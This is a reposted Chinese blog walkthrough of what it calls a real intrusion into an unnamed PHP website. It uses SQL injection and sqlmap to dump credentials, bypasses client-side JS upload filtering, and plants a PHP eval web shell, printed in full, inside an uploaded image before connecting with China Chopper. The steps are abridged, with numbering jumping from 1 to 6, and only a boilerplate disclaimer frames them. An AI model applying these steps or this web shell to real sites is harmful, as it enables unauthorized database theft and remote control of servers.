记录一次实战,注入+本地JS绕过拿shell
2022-7-30 09:8:41
Author: 黑白之道(查看原文)
阅读量:20
收藏
正文
1.找注入点
http://xxxxxx/xxxx.php?id=6’ ,没有回显
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。
文章来源:CSDN博客(Randmancy)
原文地址:
https://blog.csdn.net/qq_34341458/article/details/113845203
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
多一个点在看多一条小鱼干
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650546640&idx=3&sn=e4ed3b1ffaca54b6c415a1fbb38031f9&chksm=83bd4434b4cacd22ff3559c5d5391e4944db92c136f26ffc5f78444d7d665c6065a3240e21b7#rd
如有侵权请联系:admin#unsafe.sh